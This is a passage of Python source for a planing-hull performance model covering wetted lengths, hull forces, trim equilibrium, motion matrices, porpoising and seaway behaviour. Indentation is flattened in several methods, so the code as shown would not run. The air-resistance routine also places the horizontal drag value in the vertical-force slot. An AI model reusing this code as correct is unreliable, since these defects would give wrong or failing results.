self.lT = lT
self.length = length
self.H_sig = H_sig
self.ahr = ahr
self.Lf = Lf
self.sigma = sigma
self.delta = delta
self.l_air = l_air
self.h_air = h_air
self.b_air= b_air
self.C_shape = C_shape
self.z_wl = z_wl
self.tau = tau
self.eta_3 = 0
self.eta_5 = 0
self.rho = rho
self.nu = nu
self.rho_air = rho_air
self.C_D = C_D
self.g = g
self.gravity_force = np.array([0, -self.weight, 0])
self.wetted_lengths_type = wetted_lengths_type
self.z_max_type = z_max_type
self.seaway_drag_type = seaway_drag_type
    def print_description(self, sigFigs=7, runAllFunctions=True):
        """Returns a formatted description of the vessel.

        Args:
            sigFigs (int, optional): Number of significant figures to display. Defaults to 7.
            runAllFunctions (bool, optional): Runs all functions with default values before printing results. Defaults to True.
        """
        # Refresh all derived quantities so the printed table is current.
        if runAllFunctions:
            self.get_geo_lengths()
            self.get_forces(runGeoLengths=False)
            self.get_eom_matrices(runGeoLengths=False)
            self.get_seaway_behavior()
            self.check_porpoising()

        # NOTE(review): computed but never referenced below (the table
        # recomputes volume inline) — confirm before removing.
        volume = self.weight/(self.g*self.rho)

        # Each row is either [''] (blank spacer), ['---SECTION---'] (header),
        # or [description, value, unit-string]; values may be scalars,
        # lists, or numpy arrays.
        table = [
            ['---VESSEL---'],
            ['Speed', self.speed, 'm/s'],
            ['V_k', self.speed*1.944, 'knot'],
            ['Fn (beam)', self.speed/np.sqrt(self.g*self.beam), ''],
            ['Fn (volume)', self.speed/np.sqrt(self.g*(self.weight/(self.g*self.rho))**(1/3)), ''],
            [''],
            ['Weight', self.weight, 'N'],
            ['Mass', self.weight/self.g, 'kg'],
            ['Volume', self.weight/(self.g*self.rho), 'm\u00B3'],
            ['Beam', self.beam, 'm'],
            ['LCG', self.lcg, 'm from stern'],
            ['VCG', self.vcg, 'm from keel'],
            ['R_g', self.r_g, 'm'],
            ['Deadrise', self.beta, 'deg'], #'\N{greek small letter beta}'
            [''],
            ['LOA', self.length, 'm'],
            ['AHR', self.ahr, 'm, average hull roughness'],
            [''],
            ['---ATTITUDE---'],
            ['z_wl', self.z_wl, 'm, vertical distance of center of gravity to the calm water line'],
            ['tau', self.tau, 'deg, trim angle'],
            ['\u03B7\u2083', self.eta_3, 'deg, additional heave'],
            ['\u03B7\u2085', self.eta_5, 'deg, additional trim'],
            ['Transom draft', self.L_K*np.sin((self.tau+self.eta_5)*np.pi/180), 'm, draft of keel at transom'],
            [''],
            ['---PROPULSION---'],
            ['Thrust angle', self.epsilon, 'deg w.r.t. keel (CCW with body-fixed origin at 9 o\'clock)'],
            ['LCT', self.lT, 'm from stern, positive forward'],
            ['VCT', self.vT, 'm from keel, positive up'],
            [''],
            ['---FLAP---'],
            ['Chord', self.Lf, 'm'],
            ['Span/Beam', self.sigma, ''],
            ['Angle', self.delta, 'deg w.r.t. keel (CCW with body-fixed origin at 9 o\'clock)'],
            [''],
            ['---AIR DRAG---'],
            ['l_air', self.l_air, 'm, distance from stern to center of air pressure'],
            ['h_air', self.h_air, 'm, height from keel to top of square which bounds the air-drag-inducing shape'],
            ['b_air', self.b_air, 'm, transverse width of square which bounds the air-drag-inducing shape'],
            ['C_shape', self.C_shape, 'area coefficient for air-drag-inducing shape. C_shape = 1 means the air drag reference area is h_air*b_air'],
            ['C_D', self.C_D, 'air drag coefficient'],
            [''],
            ['---ENVIRONMENT---'],
            ['\u03C1', self.rho, 'kg/m\u00B3, water density'],
            ['\u03BD', self.nu, 'm\u00B2/s, water kinematic viscosity'],
            ['\u03C1_air', self.rho_air, 'kg/m\u00B3, air density'],
            ['g', self.g, 'm/s\u00B2, gravitational acceleration'],
            [''],
            ['---WETTED LENGTH OPTIONS---'],
            ['wetted_lengths_type', self.wetted_lengths_type, '(1 = Use Faltinsen 2005 wave rise approximation, 2 = Use Savitsky\'s \'64 approach, 3 = Use Savitsky\'s \'76 approach)'],
            ['z_max_type', self.z_max_type, '(1 = Uses 3rd order polynomial fit (faster, recommended), 2 = Use cubic interpolation)'],
            [''],
            ['---WETTED LENGTHS---'],
            ['L_K', self.L_K, 'm, keel wetted length'],
            ['L_C', self.L_C, 'm, chine wetted length'],
            ['\u03BB', self.lambda_W, 'mean wetted-length to beam ratio (L_K+L_C)/(2*beam)'],
            ['x_s', self.x_s, 'm, distance from keel/water-line intersection to start of wetted chine'],
            ['z_max', self.z_max, 'maximum pressure coordinate coefficient (z_max/Ut)'],
            [''],
            ['---FORCES [F_x (N, +aft), F_z (N, +up), M_cg (N*m, +pitch up)]---'],
            ['Hydrodynamic Force', self.hydrodynamic_force, ''],
            ['Skin Friction', self.skin_friction, ''],
            ['Air Resistance', self.air_resistance, ''],
            ['Flap Force', self.flap_force, ''],
            ['Net Force', self.net_force, ''],
            ['Resultant Thrust', self.thrust_force, ''],
            [''],
            ['---THURST & POWER---'],
            ['Thrust Magnitude', np.sqrt(self.thrust_force[0]**2+self.thrust_force[1]**2), 'N'],
            ['Effective Thrust', -self.thrust_force[0], 'N'],
            ['Eff. Power', -self.thrust_force[0]*self.speed/1000, 'kW'],
            ['Eff. Horsepower', -self.thrust_force[0]*self.speed/1000/0.7457, 'hp'],
            [''],
            ['---EOM MATRICES---'],
            ['Mass matrix, [kg, kg*m/rad; kg*m, kg*m\u00B2/rad]', self.mass_matrix, ''],
            ['Damping matrix, [kg/s, kg*m/(s*rad); kg*m/s, kg*m\u00B2/(s*rad)]', self.damping_matrix, ''],
            ['Restoring matrix, [N/m, N/rad; N, N*m/rad]', self.restoring_matrix, ''],
            [''],
            ['---PORPOISING---'],
            ['[[Eigenvalue check result, Est. pitch settling time (s)],\n [Savitsky chart result, Critical trim angle (deg)]]', np.array(self.porpoising), ''],
            [''],
            ['---BEHAVIOR IN WAVES---'],
            ['H_sig', self.H_sig, 'm, significant wave heigth'],
            ['R_AW', self.R_AW, 'N, added resistance in waves'],
            ['Average impact acceleration [n_cg, n_bow] (g\'s)', self.avg_impact_acc, ''],
        ]

        cLens=[16,0,0] #Min spacing for columns
        for row in table:
            if len(row)==3:
                if row[1] is None:
                    # Unset optional value (e.g. length or H_sig left as None).
                    print('{desc:<{cL0}} {val:<{cL1}} {unit:<{cL2}}'.format(desc=row[0], val=row[1], unit='None', cL0='', cL1=cLens[1], cL2=cLens[2]))
                elif isinstance(row[1], (list,np.ndarray)):
                    # Arrays/matrices print on their own lines, with floats
                    # formatted to sigFigs significant digits.
                    print(row[0]+' =')
                    with np.printoptions(formatter={'float': f'{{:.{sigFigs}g}}'.format}):
                        print(row[1])
                    print(row[2])
                else:
                    # Scalar rows print as "description value unit".
                    print('{desc:<{cL0}} {val:<{cL1}.{sNum}g} {unit:<{cL2}}'.format(desc=row[0], val=row[1], unit=row[2], cL0=cLens[0], cL1=cLens[1], cL2=cLens[2], sNum=sigFigs))
            else:
                # Section headers and blank spacer rows.
                print(row[0])
def get_geo_lengths(self):
"""This function outputs the geometric lengths.
Adds/updates the following attributes:
- :attr:`L_K`
- :attr:`L_C`
- :attr:`lambda_W`
- :attr:`x_s`
- :attr:`z_max`
"""
b = self.beam
lcg = self.lcg
vcg = self.vcg
z_wl = self.z_wl
tau = self.tau
beta = self.beta
eta_3 = self.eta_3
eta_5 = self.eta_5
pi = np.pi
wetted_lengths_type = self.wetted_lengths_type
z_max_type = self.z_max_type
#Keel wetted length, Eq. 9.50 of Faltinsen 2005, page 367
L_K = lcg + vcg / np.tan(pi/180*(tau + eta_5)) - (z_wl + eta_3) / np.sin(pi/180*(tau + eta_5))
if L_K < 0:
L_K = 0
if wetted_lengths_type == 1:
#z_max/Vt coefficient, Table 8.3 of Faltinsen 2005, page 303---------------
beta_table = [4, 7.5, 10, 15, 20, 25, 30, 40]
z_max_table = [0.5695, 0.5623, 0.5556, 0.5361, 0.5087, 0.4709, 0.4243, 0.2866]
#Extrapolation warning
if beta < beta_table[0] or beta > beta_table[-1]:
warnings.warn('Deadrise ({0:.3f}) outside the interpolation range of 4-40 deg (Table 8.3 of Faltinsen 2005). Extrapolated values might be inaccurate.'.format(beta), stacklevel=2)
if z_max_type == 1:
z_max = np.polyval([-2.100644618790201e-006, -6.815747611588763e-005, -1.130563334939335e-003, 5.754510457848798e-001], beta)
elif z_max_type == 2:
z_max_func = interpolate.interp1d(beta_table, z_max_table, kind='cubic', fill_value='extrapolate') #Interpolation of the table
z_max = z_max_func(beta)
#--------------------------------------------------------------------------
#Distance from keel/water-line intersection to start of wetted chine (Eq. 9.10 of Faltinsen)
x_s = 0.5 * b * np.tan(pi/180*beta) / ((1 + z_max) * (pi/180)*(tau + eta_5))
if x_s < 0:
x_s = 0
#Chine wetted length, Eq. 9.51 of Faltinsen 2005
L_C = L_K - x_s
if L_C < 0:
L_C = 0
x_s = L_K
warnings.warn('Vessel operating with dry chines (L_C = 0).', stacklevel=2)
#Mean wetted length-to-beam ratio
lambda_W = (L_K + L_C) / (2 * b)
elif wetted_lengths_type == 2:
#Eq. 3 of Savitsky '64
x_s = b/pi*np.tan(pi/180*beta)/np.tan(pi/180*(tau + eta_5))
#Chine wetted length
L_C = L_K - x_s
if L_C < 0:
L_C = 0
x_s = L_K
warnings.warn('Vessel operating with dry chines (L_C = 0).', stacklevel=2)
#Mean wetted length-to-beam ratio
lambda_W = (L_K + L_C)/(2*b)
#z_max/Vt coefficient (E. 9.10 of Faltinsen 2005 rearranged)
z_max = 0.5 * b * np.tan(pi/180*beta) / (x_s * (pi/180)*(tau + eta_5)) - 1
elif wetted_lengths_type == 3:
#Eq. 12 of Savitsky '76
w = (0.57 + beta/1000)*(np.tan(pi/180*beta)/(2*np.tan(pi/180*(tau+eta_5)))-beta/167)
lambda_K = L_K/b
#Eq. 14 of Savitsky '76
lambda_C = (lambda_K-w)-0.2*np.exp(-(lambda_K-w)/0.3)
if lambda_C < 0:
lambda_C = 0
L_C = lambda_C*b
#Mean wetted length-to-beam ratio, Eq. 15 of Savitsky '76
lambda_W = (lambda_K + lambda_C)/2+0.03
x_s = L_K-L_C
#z_max/Vt coefficient (E. 9.10 of Faltinsen 2005 rearranged)
z_max = 0.5 * b * np.tan(pi/180*beta) / (x_s * (pi/180)*(tau + eta_5)) - 1
if self.length is not None:
if L_K > self.length:
warnings.warn('The estimated wetted chine length ({0:.3f}) is larger than the vessel length ({1:.3f}).'.format(L_K, self.length), stacklevel=2)
#Update values
self.L_K = L_K
self.L_C = L_C
self.lambda_W = lambda_W
self.x_s = x_s
self.z_max = z_max
def get_forces(self, runGeoLengths=True):
"""This function calls all the force functions to update the respective object attributes.
Adds/updates the following attributes:
- :attr:`hydrodynamic_force`
- :attr:`skin_friction`
- :attr:`air_resistance`
- :attr:`flap_force`
- :attr:`thrust_force`
- :attr:`net_force`
Args:
runGeoLengths (boolean, optional): Calculate the wetted lengths before calculating the forces. Defaults to True.
Methods:
get_hydrodynamic_force(): This function follows Savitsky 1964 and Faltinsen 2005 in calculating the vessel's hydrodynamic forces and moment.
get_skin_friction(): This function outputs the frictional force of the vessel using ITTC 1957 and the Bowden and Davison 1974 roughness coefficient.
get_air_resistance(): This function estimates the air drag. It assumes a square shape projected area with a shape coefficient.
get_flap_force(): This function outputs the flap forces w.r.t. global coordinates (Savitsky & Brown 1976). Horz: Positive Aft, Vert: Positive Up, Moment: Positive CCW.
sum_forces(): This function gets the sum of forces and moments, and consequently the required net thrust. The coordinates are positive aft, positive up, and positive counterclockwise.
"""
if runGeoLengths:
self.get_geo_lengths() #Calculated wetted lengths in get_forces()
g = self.g
rho_air = self.rho_air
C_D = self.C_D
rho = self.rho
nu = self.nu
AHR = self.ahr
W = self.weight
epsilon = self.epsilon
vT = self.vT
lT = self.lT
U = self.speed
b = self.beam
lcg = self.lcg
vcg = self.vcg
Lf = self.Lf
sigma = self.sigma
delta = self.delta
beam = self.beam
l_air = self.l_air
h_air = self.h_air
b_air = self.b_air
C_shape = self.C_shape
z_wl = self.z_wl
tau = self.tau
beta = self.beta
eta_3 = self.eta_3
eta_5 = self.eta_5
L_K = self.L_K
L_C = self.L_C
lambda_W = self.lambda_W
x_s = self.x_s
z_max = self.z_max
pi = np.pi
def get_hydrodynamic_force():
"""This function follows Savitsky 1964 and Faltinsen 2005 in calculating the vessel's hydrodynamic forces and moment.
"""
#Beam Froude number
Fn_B = U/np.sqrt(g*b)
#Warnings
if Fn_B < 0.6 or Fn_B > 13:
warnings.warn('Beam Froude number = {0:.3f}, outside of range of applicability (0.60 <= U/sqrt(g*b) <= 13.00) for planing lift equation. Results are extrapolations.'.format(Fn_B), stacklevel=2)
if lambda_W > 4:
warnings.warn('Mean wetted length-beam ratio = {0:.3f}, outside of range of applicability (lambda <= 4) for planing lift equation. Results are extrapolations.'.format(lambda_W), stacklevel=2)
if tau < 2 or tau > 15:
warnings.warn('Vessel trim = {0:.3f}, outside of range of applicability (2 deg <= tau <= 15 deg) for planing lift equation. Results are extrapolations.'.format(tau), stacklevel=2)
#0-Deadrise lift coefficient
C_L0 = (tau + eta_5)**1.1 * (0.012 * lambda_W**0.5 + 0.0055 * lambda_W**2.5 / Fn_B**2)
#Lift coefficient with deadrise, C_Lbeta
C_Lbeta = C_L0 - 0.0065 * beta * C_L0**0.6
#Vertical force (lift)
F_z = C_Lbeta * 0.5 * rho * U**2 * b**2
#Horizontal force
F_x = F_z*np.tan(pi/180*(tau + eta_5))
#Lift's Normal force w.r.t. keel
F_N = F_z / np.cos(pi/180*(tau + eta_5))
#Longitudinal position of the center of pressure, l_p (Eq. 4.41, Doctors 1985)
l_p = lambda_W * b * (0.75 - 1 / (5.21 * (Fn_B / lambda_W)**2 + 2.39)) #Limits for this is (0.60 < Fn_B < 13.0, lambda < 4.0)
#Moment about CG (Axis consistent with Fig. 9.24 of Faltinsen (P. 366)
M_cg = - F_N * (lcg - l_p)
#Update values
self.hydrodynamic_force = np.array([F_x, F_z, M_cg])
def get_skin_friction():
"""This function outputs the frictional force of the vessel using ITTC 1957 and the Bowden and Davison 1974 roughness coefficient.
"""
#Surface area of the dry-chine region
S1 = x_s * b / (2 * np.cos(pi/180*beta))
if L_K < x_s:
S1 = S1 * (L_K / x_s)**2
#Surface area of the wetted-chine region
S2 = b * L_C / np.cos(pi/180*beta)
#Total surface area
S = S1 + S2
if S == 0:
F_x = 0
F_z = 0
M_cg = 0
else:
#Mean bottom fluid velocity, Savitsky 1964 - Hadler's empirical formula
V_m = U * np.sqrt(1 - (0.012 * tau**1.1 * np.sqrt(lambda_W) - 0.0065 * beta * (0.012 * np.sqrt(lambda_W) * tau**1.1)**0.6) / (lambda_W * np.cos(tau * pi/180)))
#Reynolds number (with bottom fluid velocity)
Rn = V_m * lambda_W * b / nu
#'Friction coefficient' ITTC 1957
C_f = 0.075/(np.log10(Rn) - 2)**2
#Additional 'friction coefficient' due to skin friction, Bowden and Davison (1974)
deltaC_f = (44*((AHR/(lambda_W*b))**(1/3) - 10*Rn**(-1/3)) + 0.125)/10**3
#Frictional force
R_f = 0.5 * rho * (C_f + deltaC_f) * S * U**2
#Geometric vertical distance from keel
l_f = (b / 4 * np.tan(pi/180*beta) * S2 + b / 6 * np.tan(pi/180*beta) * S1) / (S1 + S2)
#Horizontal force
F_x = R_f * np.cos(pi/180*(tau + eta_5))
#Vertical force
F_z = - R_f * np.sin(pi/180*(tau + eta_5))
#Moment about CG (Axis consistent with Fig. 9.24 of Faltinsen (P. 366))
M_cg = R_f * (l_f - vcg)
#Update values
self.skin_friction = np.array([F_x, F_z, M_cg])
def get_air_resistance():
"""This function estimates the air drag. It assumes a square shape projected area with a shape coefficient.
"""
if C_shape == 0 or b_air == 0:
self.air_resistance = np.array([0, 0, 0])
return
#Vertical distance from calm water line to keel at LOA
a_dist = np.sin(pi/180*(tau + eta_5))*(l_air-L_K)
#Vertical distance from keel to horizontal line level with boat's height
b_dist = np.cos(pi/180*(tau + eta_5))*h_air
#Vertical distance from CG to center of square (moment arm, positive is CG above)
momArm = z_wl - (a_dist + b_dist)/2
#Square projected area
Area = (a_dist+b_dist)*b_air*C_shape
if Area < 0:
Area = 0
#Horizontal force (Positive aft)
F_x = 0.5*rho_air*C_D*Area*U**2
#Vertical force (Positive up)
F_z = 0
#Moment (positve CCW)
M_cg = -F_x*momArm
#Update values
self.air_resistance = np.array([F_x, F_x, M_cg])
def get_flap_force():
"""This function outputs the flap forces w.r.t. global coordinates (Savitsky & Brown 1976). Horz: Positive Aft, Vert: Positive Up, Moment: Positive CCW.
"""
if Lf == 0:
self.flap_force = np.array([0, 0, 0])
return
#Warnings
if Lf > 0.10*(L_K + L_C)/2 or Lf < 0:
warnings.warn('Flap chord = {0:.3f} outside of bounds (0-10% of mean wetted length) for flap forces estimates with Savitsky & Brown 1976'.format(Lf), stacklevel=2)
if delta < 0 or delta > 15:
warnings.warn('Flap deflection angle = {0:.3f} out of bounds (0-15 deg) for flap forces estimates with Savitsky & Brown 1976'.format(delta), stacklevel=2)
Fn_B = U/np.sqrt(g*b)
if Fn_B < 2 or Fn_B > 7:
warnings.warn('Beam-based Froude number Fn_B = {0:.3f} out of bounds (2-7) for flap forces estimates with Savitsky & Brown 1976'.format(Fn_B), stacklevel=2)
F_z = 0.046*(Lf*3.28084)*delta*sigma*(b*3.28084)*(rho/515.379)/2*(U*3.28084)**2*4.44822
F_x = 0.0052*F_z*(tau+eta_5+delta)
l_flap = 0.6*b+Lf*(1-sigma)
M_cg = -F_z*(lcg-l_flap)
#Update values
self.flap_force = np.array([F_x, F_z, M_cg])
def sum_forces():
"""This function gets the sum of forces and moments, and consequently the required net thrust. The coordinates are positive aft, positive up, and positive counterclockwise.
"""
#Call all force functions-------
get_hydrodynamic_force()
get_skin_friction()
get_air_resistance()
get_flap_force()
#-------------------------------
forcesMatrix = np.column_stack((self.gravity_force, self.hydrodynamic_force, self.skin_friction, self.air_resistance, self.flap_force)) #Forces and moments
F_sum = np.sum(forcesMatrix, axis=1) #F[0] is x-dir, F[1] is z-dir, and F[2] is moment
#Required thrust and resultant forces
T = F_sum[0]/np.cos(pi/180*(epsilon+tau+eta_5)); #Magnitude
T_z = T*np.sin(pi/180*(epsilon+tau+eta_5)); #Vertical
T_cg = T*np.cos(pi/180*epsilon)*(vcg - vT) - T*np.sin(pi/180*epsilon)*(lcg - lT); #Moment about cg
#Update resultant thurst values
self.thrust_force = np.array([-F_sum[0], T_z, T_cg])
#Include resultant thrust forces in sum
F_sum[1] = F_sum[1]+T_z
F_sum[2] = F_sum[2]+T_cg
#Update values
self.net_force = F_sum
#Call functions
sum_forces()
def get_steady_trim(self, x0=[0, 3], tauLims=[0.5, 35], tolF=10**-6, maxiter=50):
"""This function finds and sets the equilibrium point when the vessel is steadily running in calm water.
Updates the following attributes:
- :attr:`z_wl`
- :attr:`tau`
Args:
x0 (list of float): Initial guess for equilibirum point [z_wl (m), tau (deg)]. Defaults to [0, 3].
tauLims (list of float): Limits for equilibrium trim search. Defaults to [0.5, 35].
tolF (float): Tolerance for convergence to zero. Defaults to 10**-6.
maxiter (float): Maximum iterations. Defaults to 50.
"""
def _boatForces(x):
self.z_wl = x[0]/10 #the division is for normalization of the variables
self.tau = x[1]
self.get_forces()
return self.net_force[1:3]
def _boatForcesPrime(x):
return ndmath.complexGrad(_boatForces, x)
def _L_K(x):
# self.z_wl = x[0]/10
# self.tau = x[1]
# self.get_geo_lengths() #No need to call, because ndmath's nDimNewton allways calls the obj function before calling this "constraint"
return [-self.L_K]
xlims = np.array([[-np.Inf, np.Inf], tauLims])
warnings.filterwarnings("ignore", category=UserWarning)
[self.z_wl, self.tau] = ndmath.nDimNewton(_boatForces, x0, _boatForcesPrime, tolF, maxiter, xlims, hehcon=_L_K)/[10, 1]
warnings.filterwarnings("default", category=UserWarning)
    def get_eom_matrices(self, runGeoLengths=True):
        """This function returns the mass, damping, and stiffness matrices following Faltinsen 2005.

        Adds/updates the following parameters:

        - :attr:`mass_matrix`
        - :attr:`damping_matrix`
        - :attr:`restoring_matrix`

        Each is a 2x2 array for the coupled heave (3) / pitch (5) degrees of
        freedom, indexed [[33, 35], [53, 55]].

        Args:
            runGeoLengths (boolean, optional): Calculate the wetted lengths before calculating the EOM matrices. Defaults to True.

        Methods:
            get_mass_matrix(): This function returns the added mass coefficients following Sec. 9.4.1 of Faltinsen 2005, including weight and moment of inertia.
            get_damping_matrix(): This function returns the damping coefficients following Sec. 9.4.1 of Faltinsen 2005.
            get_restoring_matrix(diffType=1, step=10**-6.6): This function returns the restoring coefficients following the approach in Sec. 9.4.1 of Faltinsen 2005.
        """
        if runGeoLengths:
            self.get_geo_lengths() #Calculated wetted lengths in get_eom_matrices()
        # Local aliases of the object state used by the nested functions below
        W = self.weight
        U = self.speed
        rho = self.rho
        b = self.beam
        lcg = self.lcg
        tau = self.tau
        beta = self.beta
        g = self.g
        r_g = self.r_g
        eta_5 = self.eta_5
        L_K = self.L_K
        L_C = self.L_C
        lambda_W = self.lambda_W
        x_s = self.x_s
        z_max = self.z_max
        pi = np.pi
        def get_mass_matrix():
            """This function returns the added mass coefficients following Sec. 9.4.1 of Faltinsen 2005, including weight and moment of inertia
            """
            #Distance of CG from keel-WL intersection
            x_G = L_K - lcg
            #K constant (Eq. 9.63 of Faltinsen 2005)
            K = (pi / np.sin(pi/180*beta) * gamma(1.5 - beta/180) / (gamma(1 - beta/180)**2 * gamma(0.5 + beta/180)) - 1) / np.tan(pi/180*beta)
            kappa = (1 + z_max) * (pi/180)*(tau + eta_5) #User defined constant
            #Based on Faltinsen's (dry-chine contribution, A1_* terms)
            A1_33 = rho * kappa**2 * K * x_s**3 / 3
            A1_35 = A1_33 * (x_G - x_s * 3/4)
            A1_53 = A1_35
            A1_55 = A1_33 * (x_G**2 - 3/2 * x_G * x_s + 3/5 * x_s**2)
            #Contribution from wet-chine region
            if L_C > 0:
                C_1 = 2 * np.tan(pi/180*beta)**2 / pi * K
                A2_33 = (rho * b**3) * C_1 * pi / 8 * L_C / b
                A2_35 = (rho * b**4) * (- C_1 * pi / 16 * ((L_K / b)**2 - (x_s / b)**2) + x_G / b * A2_33 / (rho * b**3))
                A2_53 = A2_35
                A2_55 = (rho * b**5) * (C_1 * pi / 24 * ((L_K / b)**3 - (x_s / b)**3) - C_1 / 8 * pi * (x_G / b) * ((L_K / b)**2 - (x_s / b)**2) + (x_G / b)**2 * A2_33 / (rho * b**3))
            else:
                #Dry chines: no wet-chine added-mass contribution
                A2_33 = 0
                A2_35 = 0
                A2_53 = 0
                A2_55 = 0
            #Total added mass & update values (rigid-body mass/inertia added to the diagonal)
            A_33 = A1_33 + A2_33 + W/g # kg, A_33
            A_35 = A1_35 + A2_35 # kg*m/rad, A_35
            A_53 = A1_53 + A2_53 # kg*m, A_53
            A_55 = A1_55 + A2_55 + W/g*r_g**2 # kg*m^2/rad, A_55
            self.mass_matrix = np.array([[A_33, A_35], [A_53, A_55]])
        def get_damping_matrix():
            """This function returns the damping coefficients following Sec. 9.4.1 of Faltinsen 2005

            NOTE: relies on self.mass_matrix, so get_mass_matrix() must run first.
            """
            #Heave-heave added mass (need to substract W/g since it was added)
            A_33 = self.mass_matrix[0,0] - W/g
            if L_C > 0:
                d = 0.5 * b * np.tan(pi/180*beta)
            else:
                d = (1 + z_max) * (pi/180)*(tau + eta_5) * L_K
            #K constant (Eq. 9.63 of Faltinsen 2005, P. 369)
            K = (pi / np.sin(pi/180*beta) * gamma(1.5 - beta/180) / (gamma(1 - beta/180)**2 * gamma(0.5 + beta/180)) - 1) / np.tan(pi/180*beta)
            #2D Added mass coefficient in heave
            a_33 = rho * d**2 * K
            #Infinite Fn lift coefficient
            C_L0 = (tau + eta_5)**1.1 * 0.012 * lambda_W**0.5
            #Derivative w.r.t. tau (rad) of inf. Fn C_L0
            dC_L0 = (180 / pi)**1.1 * 0.0132 * (pi/180*(tau + eta_5))**0.1 * lambda_W**0.5
            #Derivative w.r.t. tau (rad) of inf. Fn C_Lbeta
            dC_Lbeta = dC_L0 * (1 - 0.0039 * beta * C_L0**-0.4)
            #Damping coefficients & update values
            B_33 = rho / 2 * U * b**2 * dC_Lbeta # kg/s, B_33, Savitsky based
            B_35 = - U * (A_33 + lcg * a_33) # kg*m/(s*rad), B_35, Infinite frequency based
            B_53 = B_33 * (0.75 * lambda_W * b - lcg) # kg*m/s, B_53, Savitsky based
            B_55 = U * lcg**2 * a_33 # kg*m**2/(s*rad), B_55, Infinite frequency based
            self.damping_matrix = np.array([[B_33, B_35], [B_53, B_55]])
        def get_restoring_matrix(diffType=1, step=10**-6.6):
            """This function returns the restoring coefficients following the approach in Sec. 9.4.1 of Faltinsen 2005

            Numerically differentiates the net heave force / pitch moment with
            respect to (eta_3, eta_5), temporarily perturbing the object state.

            Args:
                diffType (int, optional): 1 (recommended) = Complex step method, 2 = Foward step difference. Defaults to 1.
                step (float, optional): Step size if using diffType == 2. Defaults to 10**-6.6.
            """
            def _func(eta):
                self.eta_3 = eta[0]
                self.eta_5 = eta[1]
                self.get_forces()
                return self.net_force[1:3]
            temp_eta_3 = self.eta_3
            temp_eta_5 = self.eta_5
            if diffType == 1:
                C_full = -ndmath.complexGrad(_func, [temp_eta_3, temp_eta_5])
            elif diffType == 2:
                C_full = -ndmath.finiteGrad(_func, [temp_eta_3, temp_eta_5], 10**-6.6)
            #Reset values (the gradient evaluation mutated eta_3/eta_5 and the forces)
            self.eta_3 = temp_eta_3
            self.eta_5 = temp_eta_5
            self.get_forces()
            #Conversion deg to rad (degree in denominator)
            C_full[0,1] = C_full[0,1] / (pi/180) # N/rad, C_35
            C_full[1,1] = C_full[1,1] / (pi/180) # N*m/rad, C_55
            #Update values
            self.restoring_matrix = C_full
        #Call functions (order matters: damping reads self.mass_matrix)
        get_mass_matrix()
        get_damping_matrix()
        get_restoring_matrix()
def check_porpoising(self, stepEstimateType=1):
"""This function checks for porpoising.
Adds/updates the following parameters:
- :attr:`porpoising` (list):
Args:
stepEstimateType (int, optional): Pitch step response settling time estimate type, 1 = -3/np.real(eigVals[0])], 2 = Time-domain simulation estimate. Defaults to 1.
"""
#Eigenvalue analysis
try:
self.mass_matrix
except AttributeError:
warnings.warn('No Equation Of Motion (EOM) matrices found. Running get_eom_matrices().', stacklevel=2)
self.get_eom_matrices()
M = self.mass_matrix
C = self.damping_matrix
K = self.restoring_matrix
nDim = len(M)
A_ss = np.concatenate((np.concatenate((np.zeros((nDim,nDim)), np.identity(nDim)), axis=1), np.concatenate((-np.linalg.solve(M,K), -np.linalg.solve(M,C)), axis=1))) #State space reprecentation
eigVals = np.linalg.eigvals(A_ss)
eig_porpoise = any(eigVal >= 0 for eigVal in eigVals)
if stepEstimateType == 1:
settling_time = -3/np.real(eigVals[0])
elif stepEstimateType == 2:
B_ss = np.array([[1],[0],[0],[0]]) #Pitch only
C_ss = np.array([[1,0,0,0]]) #Pitch only
D_ss = np.array([[0]])
system = (A_ss,B_ss,C_ss,D_ss)
t, y = signal.step(system)
settling_time = (t[next(len(y)-i for i in range(2,len(y)-1) if abs(y[-i]/y[-1])>1.02)]-t[0])
#Savitsky '64 chart method
C_L = self.weight/(1/2*self.rho*self.speed**2*self.beam**2)
x = np.sqrt(C_L/2)
#Warnings
if x > 0.3 or x < 0.13:
warnings.warn('Lift Coefficient = {0:.3f} outside of bounds (0.0338-0.18) for porpoising estimates with Savitsky 1964. Results are extrapolations.'.format(C_L), stacklevel=2)
if self.beta > 20:
warnings.warn('Deadrise = {0:.3f} outside of bounds (0-20 deg) for porpoising estimates with Savitsky 1964. Results are extrapolations.'.format(self.beta), stacklevel=2)
tau_crit_0 = -376.37*x**3 + 329.74*x**2 - 38.485*x + 1.3415
tau_crit_10 = -356.05*x**3 + 314.36*x**2 - 41.674*x + 3.5786
tau_crit_20 = -254.51*x**3 + 239.65*x**2 - 23.936*x + 3.0195
tau_crit_func = interpolate.interp1d([0, 10, 20], [tau_crit_0, tau_crit_10, tau_crit_20], kind='quadratic', fill_value='extrapolate')
tau_crit = tau_crit_func(self.beta)
if self.tau > tau_crit:
chart_porpoise = True
else:
chart_porpoise = False
#Update values
self.porpoising = [[eig_porpoise, settling_time], [chart_porpoise, float(tau_crit)]]
def get_seaway_behavior(self):
"""This function calculates the seaway behavior as stated in Savitsky & Brown '76.
Adds/updates the following parameters:
- :attr:`avg_impact_acc`
- :attr:`R_AW`
"""
if self.H_sig is None:
self.H_sig = self.beam*0.5 #Arbitrary wave height if no user-defined wave height
warnings.warn('Significant wave height has not been specified. Using beam*0.5 = {0:.3f} m.'.format(self.H_sig), stacklevel=2)
if self.length is None:
self.length = self.beam*3
warnings.warn('Vessel length has not been specified. Using beam*3 = {0:.3f} m.'.format(self.length), stacklevel=2)
H_sig = self.H_sig
W = self.weight
beta = self.beta
tau = self.tau
pi = np.pi
Delta_LT = W/9964 #Displacement in long tons
Delta = Delta_LT*2240 #Displacement in lbf
L = self.length*3.281 #Length in ft
b = self.beam*3.281 #Beam in ft
Vk = self.speed*1.944 #Speed in knots
Vk_L = Vk/np.sqrt(L) #Vk/sqrt(L)
H_sig = H_sig*3.281 #Significant wave height in ft
w = self.rho*self.g/(4.448*35.315) #Specific weight in lbf/ft^3
C_Delta = Delta/(w*b**3) #Static beam-loading coefficient
if self.seaway_drag_type == 1: #Savitsky '76
#Check that variables are inside range of applicability (P. 395 of Savitsky & Brown '76)
P1 = Delta_LT/(0.01*L)**3
P2 = L/b
P5 = H_sig/b
P6 = Vk_L
if P1 < 100 or P1 > 250:
warnings.warn('Vessel displacement coefficient = {0:.3f}, outside of range of applicability (100 <= Delta_LT/(0.01*L)^3 <= 250, with units LT/ft^3). Results are extrapolations.'.format(P1), stacklevel=2)
if P2 < 3 or P2 > 5:
